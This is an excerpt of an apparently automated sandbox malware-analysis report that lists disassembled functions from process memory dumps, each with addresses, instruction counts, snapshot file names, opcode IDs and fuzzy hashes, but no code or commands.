                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fb18ea2b4b3faeaf871713bb95e31a5c5e5a7f0f9a8679695613519f9de55f51
                                                                                            • Instruction ID: a979d542f05a3f3ba63358ae290af9557d85f891f8532dc7eab6012ce3f523b2
                                                                                            • Opcode Fuzzy Hash: fb18ea2b4b3faeaf871713bb95e31a5c5e5a7f0f9a8679695613519f9de55f51
                                                                                            • Instruction Fuzzy Hash: D1217A7191CA5D8FDB81EF68D855AEDBBF1FF59311F04016AE408E32A2CA24A8518B90
                                                                                            Function 00007FFB4B2B3F00 Relevance: .1, Instructions: 85COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b02e942abef0dd3dac6a3baaedfb4afc2528695e05b44f9133028777ccf918ab
                                                                                            • Instruction ID: 85acf573275d38f1fae65c926555df358e7d8d094002cb9c448600fda9c73a55
                                                                                            • Opcode Fuzzy Hash: b02e942abef0dd3dac6a3baaedfb4afc2528695e05b44f9133028777ccf918ab
                                                                                            • Instruction Fuzzy Hash: 38312B70D0D61A8BEBA9EE24C5593B9B6A1EF54300F1045BDD95DD32A2CE38A981CB40
                                                                                            Function 00007FFB4B2B3F0B Relevance: .1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d5fa7b6cef9e535976e6fdfce9775b22612c0c6fda95c9da3c6eaaab1ea05d18
                                                                                            • Instruction ID: ca52b237813064ae153106544972b360c91db2995fdd3e7fdb06b85cb8038686
                                                                                            • Opcode Fuzzy Hash: d5fa7b6cef9e535976e6fdfce9775b22612c0c6fda95c9da3c6eaaab1ea05d18
                                                                                            • Instruction Fuzzy Hash: 0A2160B1D0D60A8AEB68FF74C9556B97BB1EF84310F10447ED61E932E2DE38A941CB40
                                                                                            Function 00007FFB4B2B1048 Relevance: .1, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2884d97d0a76a854476fd92c45c65455bc4594c3069c94687f01e548baed1cc7
                                                                                            • Instruction ID: 721b76014edf632b0d9d9cbd25126fc9bf9f034262fc95b5992aaaa3f43a382e
                                                                                            • Opcode Fuzzy Hash: 2884d97d0a76a854476fd92c45c65455bc4594c3069c94687f01e548baed1cc7
                                                                                            • Instruction Fuzzy Hash: 58219F74A1891DCFDF84EF98D495EEEBBB1FF68301F10416AE50AE3255DA34E8418B90
                                                                                            Function 00007FFB4B2B3F43 Relevance: .1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ace328f5451481c42df0bde4088486bf2fff26352a16b9eaa9973b101ba06b9f
                                                                                            • Instruction ID: 11c22f4d02570dbf242ec174e55a2cacf39006966d2095c81b14c757fd33831d
                                                                                            • Opcode Fuzzy Hash: ace328f5451481c42df0bde4088486bf2fff26352a16b9eaa9973b101ba06b9f
                                                                                            • Instruction Fuzzy Hash: 5D215E7090D7494EEB69AE74C8157B97BB1EF45310F0404BAD509D32D2CE3858458B51
                                                                                            Function 00007FFB4B2B3FC1 Relevance: .1, Instructions: 65COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 86bdf8977953bfab2f747c2ae1002e87a96844bc3e892db6643eba56ff223e01
                                                                                            • Instruction ID: 51f8b958882c961d3bb50f4d9fcdea2774e11db0a548e3fe558062c4d3927469
                                                                                            • Opcode Fuzzy Hash: 86bdf8977953bfab2f747c2ae1002e87a96844bc3e892db6643eba56ff223e01
                                                                                            • Instruction Fuzzy Hash: 8A118BB090E78A4EEB6AAF74C8247B97FB1AF86310F0844BAD549D72D3CD289845C751
                                                                                            Function 00007FFB4B2B3F62 Relevance: .1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9702cfb20aff9ad603cca7eb05dfc12709faa99199e85e359dde4db42554a07d
                                                                                            • Instruction ID: d161d0c32e3d0d070fdece93f33831c4ccae110a3ab3afbcbfe7bba227925d2c
                                                                                            • Opcode Fuzzy Hash: 9702cfb20aff9ad603cca7eb05dfc12709faa99199e85e359dde4db42554a07d
                                                                                            • Instruction Fuzzy Hash: 5B1191B0D0DA1A8BEB68BE38C5057BA7AB1EF95310F00457DD61ED32E1CE38A8458A41
                                                                                            Function 00007FFB4B2B3F86 Relevance: .1, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1194fecc25db01f1a61b351338906bf696fac5a4e16f5fecc64ebb5bfc035f3e
                                                                                            • Instruction ID: 418b9aac53f78a95b28981665d4249a13ea2b5bec149a1dd4fa7fc3e3c97e182
                                                                                            • Opcode Fuzzy Hash: 1194fecc25db01f1a61b351338906bf696fac5a4e16f5fecc64ebb5bfc035f3e
                                                                                            • Instruction Fuzzy Hash: F21182B0D0D64A8AE7A9FF38C5453B97AA1EF84300F14847DD61E936E2DE38A841C704
                                                                                            Function 00007FFB4B2B3EEC Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 82e09e758cbe108aa713da79ef1dd683c5358352f4b2aebc520f842c94b5c87a
                                                                                            • Instruction ID: 132fd71ac38521193d1468a3e13d839dc56b27e734edc9e3f5b02b432c91d9e3
                                                                                            • Opcode Fuzzy Hash: 82e09e758cbe108aa713da79ef1dd683c5358352f4b2aebc520f842c94b5c87a
                                                                                            • Instruction Fuzzy Hash: 5C1191B0D0EB4A8FE769AF38C5193B97BB1AF45310F0454BDD619D32E2CE3858418705
                                                                                            Function 00007FFB4B2B3F74 Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ee4c70c469b415e7a627b6cee67398a220fbed2471ee262060254ac99511a125
                                                                                            • Instruction ID: 48484721c9a1c878d86af8c5597c01bbc03131055a28be05d230c9d72680ab7e
                                                                                            • Opcode Fuzzy Hash: ee4c70c469b415e7a627b6cee67398a220fbed2471ee262060254ac99511a125
                                                                                            • Instruction Fuzzy Hash: 401165B1D1DA4A8BF769BE78C5153B97AA1EF48310F14443DD60ED36D1CE38A8418644
                                                                                            Function 00007FFB4B2B3F6B Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bafffb31cd4693e6a87b37498ba3eb728c020f91b83d59e9e73f3b2bb26e11a1
                                                                                            • Instruction ID: d617abd7c9f537cc1182d7a0b8e0ab6b47b35c47f5d6bfa4a979601b210cf466
                                                                                            • Opcode Fuzzy Hash: bafffb31cd4693e6a87b37498ba3eb728c020f91b83d59e9e73f3b2bb26e11a1
                                                                                            • Instruction Fuzzy Hash: 8101ADB090E64A8FE769EF34C5153B9BBA1EF89300F04487ED50AD32D2DE38A841DB05
                                                                                            Function 00007FFB4B2B6680 Relevance: .0, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 330a2f16bac8da95591b7de471977c24d85b5c47644e228a5d6f088160fa542f
                                                                                            • Instruction ID: 18063d687fb412def6e428dd17f3e65588ba53cd2fdd166a40d916f936a5cf40
                                                                                            • Opcode Fuzzy Hash: 330a2f16bac8da95591b7de471977c24d85b5c47644e228a5d6f088160fa542f
                                                                                            • Instruction Fuzzy Hash: 92018C71C4CA4C8BCB55EF6A9C00299BBA4FB9E318F00126ED45CD7180D7769A9AC745
                                                                                            Function 00007FFB4B2B10EA Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1ed5de6d740f9cc24e51fefd1947ef30a32546f5c74e09542ad89017d6e6dc08
                                                                                            • Instruction ID: 818783ba23b71484093491ebc72d6cf9ae93bc67bb78083c04bca9f7396efc2e
                                                                                            • Opcode Fuzzy Hash: 1ed5de6d740f9cc24e51fefd1947ef30a32546f5c74e09542ad89017d6e6dc08
                                                                                            • Instruction Fuzzy Hash: 27E0D87692CA4D4BDB90FF69E8066A5FFE0FBC5309F00006DE65CD3191C62595A5C385
                                                                                            Function 00007FFB4B2B09D3 Relevance: .0, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4e98d08c48f533d595803926717cda31023b7817a2f2add4e8bb436efde34b6c
                                                                                            • Instruction ID: e01f3a021750e058c8b1eed479b66fcbaf6baed9285dd2d2397db6e54127c903
                                                                                            • Opcode Fuzzy Hash: 4e98d08c48f533d595803926717cda31023b7817a2f2add4e8bb436efde34b6c
                                                                                            • Instruction Fuzzy Hash: BCE04F7192C91E4FDB85FFA8D8855FDB7A2FB88340F004139D10DE3152CE206804C780

                                                                                            Non-executed Functions

                                                                                            Function 00007FFB4B2B57F2 Relevance: 6.5, Strings: 5, Instructions: 239COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000032.00000002.1952694644.00007FFB4B2B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_50_2_7ffb4b2b0000_BQrPGmkzolSuiSkMAkyslxsiiFSSM.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0O5K$@O5K$PO5K$`O5K$pP5K
                                                                                            • API String ID: 0-3199577557
                                                                                            • Opcode ID: d97265bf3991bb9e2f9173a16b3ba7b75b1288842f016ceb3c8eb23be179837f
                                                                                            • Instruction ID: 2f2e78d1dff202e3f2f14410f5f34d8a96a914f67c5a2c1c9411bebfafc19932
                                                                                            • Opcode Fuzzy Hash: d97265bf3991bb9e2f9173a16b3ba7b75b1288842f016ceb3c8eb23be179837f
                                                                                            • Instruction Fuzzy Hash: D8512E8770D6D20BE3167AFCFC621E97F50EF822F134941BBD288CA0ABAC15554A42D1

                                                                                            Executed Functions

                                                                                            Function 00007FFB4B2A1EC3 Relevance: 16.5, Strings: 12, Instructions: 1538COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "$H$[$[$\$]$]$u${${$}$}
                                                                                            • API String ID: 0-2063274034
                                                                                            • Opcode ID: 2d33b87bc45b895a8052922b05e37a345dcb384f4b30552b20bddca3eb3110a0
                                                                                            • Instruction ID: 6ce0efe786fcd5a1d5fec8e43257a2808c5366b12f2af5dbf3d50fb0369c5c3e
                                                                                            • Opcode Fuzzy Hash: 2d33b87bc45b895a8052922b05e37a345dcb384f4b30552b20bddca3eb3110a0
                                                                                            • Instruction Fuzzy Hash: A3D2B6B09196298FDBA9EF28C8947E9B7B1FF58301F5041EAD40DE7291CB359A81CF44
                                                                                            Function 00007FFB4B2A1250 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: 8e6064e6dec4636e8af9954c940359cf580ad1ef760d3ce3f095681468959222
                                                                                            • Instruction ID: a932450c8b096eac948a54e4890b0412997ed6752299c1f259fc1afff4f9e3b9
                                                                                            • Opcode Fuzzy Hash: 8e6064e6dec4636e8af9954c940359cf580ad1ef760d3ce3f095681468959222
                                                                                            • Instruction Fuzzy Hash: 2DA19474A18A1C8FDB98EF58C894BA8BBF1FF69311F4541A9D00DE7265CB74AC81CB41
                                                                                            Function 00007FFB4B2A3A8D Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: H#4K
                                                                                            • API String ID: 0-533413016
                                                                                            • Opcode ID: 6a6025a4ccac819a64873b5c687a2277f906e84e8811c0ec7f1b6c21abad924f
                                                                                            • Instruction ID: f1dd0fcf52d21a0fc5d6c55cc5b3c0716143e6ec91adafe15750112cc1a4b732
                                                                                            • Opcode Fuzzy Hash: 6a6025a4ccac819a64873b5c687a2277f906e84e8811c0ec7f1b6c21abad924f
                                                                                            • Instruction Fuzzy Hash: 5921A3B1A0D68A4FEB95FE38C8656E6BBA1FF59300F0540F9C149971D3DE756841C740
                                                                                            Function 00007FFB4B2A1751 Relevance: .4, Instructions: 401COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1aaeca01669f56581ca9622bb30465bc9a6f1f2ecf6881f9b6b4ffeef423851f
                                                                                            • Instruction ID: aeda1545c293f5835a94870f65dc5a2c2b57e54ad3583f258d7235d1b78a5d7a
                                                                                            • Opcode Fuzzy Hash: 1aaeca01669f56581ca9622bb30465bc9a6f1f2ecf6881f9b6b4ffeef423851f
                                                                                            • Instruction Fuzzy Hash: 00E18EB1C196998FDB99EF64D8957F8BBF1EF09311F0440BAD04DE7292CA386881CB51
                                                                                            Function 00007FFB4B2A4843 Relevance: .2, Instructions: 249COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0921db0d71f2ed93438141c6cffd4612fac60adb4501efad22fd170740648513
                                                                                            • Instruction ID: fb28cae1b0c976d604980e693d2248a278ec45e05d46f7ae04ffd6c671492f24
                                                                                            • Opcode Fuzzy Hash: 0921db0d71f2ed93438141c6cffd4612fac60adb4501efad22fd170740648513
                                                                                            • Instruction Fuzzy Hash: 5691E470D19A1D8FDB95EFA8C8957EDBBB1FF58301F1041AAD40DE3252DB34A9858B40
                                                                                            Function 00007FFB4B2A1831 Relevance: .2, Instructions: 246COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 91555159a02aff25235bf5826cdefbf21e31a1f744d894d00d4eb699dcfeeae0
                                                                                            • Instruction ID: 5717ffef55c5b99b6c3be1eea727079d7bb914de7cb59b2b44cc26688ff5d140
                                                                                            • Opcode Fuzzy Hash: 91555159a02aff25235bf5826cdefbf21e31a1f744d894d00d4eb699dcfeeae0
                                                                                            • Instruction Fuzzy Hash: E7915FB1D1865E8FDB99EF68D4957A8BBE1FF58311F0440B9D00DE7292CE385881CB41
                                                                                            Function 00007FFB4B2A0DD9 Relevance: .2, Instructions: 214COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 847bfc3a6fe3654a92cf645ac0833d621af0f3ba5827d5d15f1f019962fbb033
                                                                                            • Instruction ID: 01df96bc80b9fea63779294a1960a8aa433e860ea1e6be35bb6df47b6b500287
                                                                                            • Opcode Fuzzy Hash: 847bfc3a6fe3654a92cf645ac0833d621af0f3ba5827d5d15f1f019962fbb033
                                                                                            • Instruction Fuzzy Hash: 3B712F7191894E8FDB45FF68C495AEABBF1FF58300F1445B5D409D7296CE38A882CB90
                                                                                            Function 00007FFB4B2A08B1 Relevance: .2, Instructions: 210COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 66e6b2d0b75cd33350ae500468b8d5cce221ab0c1292d45e25f457ed830a8881
                                                                                            • Instruction ID: 7dd792b352c794f5dda9a04bfb032d57fb7df4625453b987d8555f74876b1b20
                                                                                            • Opcode Fuzzy Hash: 66e6b2d0b75cd33350ae500468b8d5cce221ab0c1292d45e25f457ed830a8881
                                                                                            • Instruction Fuzzy Hash: 4861AFB190CA5E8FEB94FF78C8946EABBE1FF59301F4441BAD509D71A2CA35A841C740
                                                                                            Function 00007FFB4B2A4380 Relevance: .2, Instructions: 207COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: eeca40539c8f575f123a85f4c9e36aa73e8717836d9bb84456030e61c6bce8ce
                                                                                            • Instruction ID: f5b16da01b390bd3401bd51fa7f6aba40df869448ce9142eedf646a1b5749b43
                                                                                            • Opcode Fuzzy Hash: eeca40539c8f575f123a85f4c9e36aa73e8717836d9bb84456030e61c6bce8ce
                                                                                            • Instruction Fuzzy Hash: 5F7115D2C1DEC64BE756BF7CD9220B97FA0AF59314B1880BBE59C864E7DD18E8058381
                                                                                            Function 00007FFB4B2A4F5C Relevance: .2, Instructions: 193COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a5319c42c5b656865160f9ee19f92cb5e354fc76a8b07fdda0f59a150d706eae
                                                                                            • Instruction ID: 4bdf44994bdeea5c323bbc772e0ba897fc35c424f77090df83c1b6cc80b2f9ba
                                                                                            • Opcode Fuzzy Hash: a5319c42c5b656865160f9ee19f92cb5e354fc76a8b07fdda0f59a150d706eae
                                                                                            • Instruction Fuzzy Hash: D071E57090992D8FDBA5EF58C894BE9BBB1FB58301F5001AAD40DE3251CB35AA85CF40
                                                                                            Function 00007FFB4B2A60C5 Relevance: .2, Instructions: 183COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1a12b7f711d20aa98f849da918bc58874d54c4fb9e585201e96ffad820ffd76f
                                                                                            • Instruction ID: 95ed5f16e43c7005b1521e06a2bf00a3ad3d21506990e63729a9643cdf5a5f89
                                                                                            • Opcode Fuzzy Hash: 1a12b7f711d20aa98f849da918bc58874d54c4fb9e585201e96ffad820ffd76f
                                                                                            • Instruction Fuzzy Hash: 2B619FB190C6598FDB96FF68C5557A8BFB1FF59300F4081BAD109D3292CB385945CB41
                                                                                            Function 00007FFB4B2A4611 Relevance: .2, Instructions: 172COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9e5d20aa98dbb7ff748962150ffe70e5c160aced9bc7010c7b560972cbfb06d0
                                                                                            • Instruction ID: ae98aa2ac642b82b1062e6a1b0a5199ec72d3a79a16cdc2e57c061051c3142a5
                                                                                            • Opcode Fuzzy Hash: 9e5d20aa98dbb7ff748962150ffe70e5c160aced9bc7010c7b560972cbfb06d0
                                                                                            • Instruction Fuzzy Hash: 3851B3B0E18A1D8FDF94EFA8C855BADBBB1FF58701F10016AD409E7691CA746881CB40
                                                                                            Function 00007FFB4B2A0AB9 Relevance: .2, Instructions: 159COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000035.00000002.2080670077.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_53_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 70dfb590b351ea82a6a1854daaa4f35f7cdcc9c63d037630c9aae6e5d2044ec7
                                                                                            • Instruction ID: c62cf88da4c323bbdf3cfe9a44ae960f6e4fe09460d94aceaa899c4c97f84aa0
                                                                                            • Opcode Fuzzy Hash: 70dfb590b351ea82a6a1854daaa4f35f7cdcc9c63d037630c9aae6e5d2044ec7
